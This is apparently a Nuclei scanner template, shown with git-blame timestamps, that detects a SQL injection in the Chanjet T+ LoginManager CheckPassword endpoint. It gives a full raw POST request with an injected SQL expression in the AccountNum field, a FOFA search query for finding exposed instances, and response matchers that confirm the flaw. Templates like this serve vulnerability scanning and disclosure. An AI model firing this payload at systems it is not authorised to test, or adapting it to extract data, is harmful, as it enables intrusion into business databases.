2023-09-15 12:23:57 +00:00
id : chanjet-tplus-ufida-sqli
2023-08-18 03:22:06 +00:00
info :
2023-09-15 12:23:57 +00:00
name : Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection
2023-08-18 03:22:06 +00:00
author : SleepingBag945
severity : high
2023-09-15 12:23:57 +00:00
description : |
Chanjet TPluse application has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference :
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20Plus%20%E5%AE%A1%E8%AE%A1%20%EF%BC%88%E8%B6%85%E8%AF%A6%E7%BB%86%EF%BC%89.md
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-09-15 12:23:57 +00:00
max-request : 1
fofa-query : app="畅捷通-TPlus"
tags : yonyou,chanjet,sqli
2023-08-18 03:22:06 +00:00
http :
- raw :
- |
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
{"AccountNum" : "123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))" , "UserName" : "admin" , "Password" : "e10adc3949ba59abbe56e057f20f883e" , "rdpYear" : "2021" , "rdpMonth" : "12" , "rdpDate" : "9" , "webServiceProcessID" : "admin" , "ali_csessionid" : "" , "ali_sig" : "" , "ali_token" : "" , "ali_scene" : "" , "role" : "" , "aqdKey" : "" , "fromWhere" : "browser" , "cardNo" : "" }
matchers-condition : and
matchers :
- type : word
2023-09-17 08:51:38 +00:00
part : body
2023-08-18 03:22:06 +00:00
words :
- "0x06d49632c9dc9bcb62aeaef99612ba6b"
- "Message\":\"245"
- "DatabaseException"
2023-10-14 11:27:55 +00:00
condition : and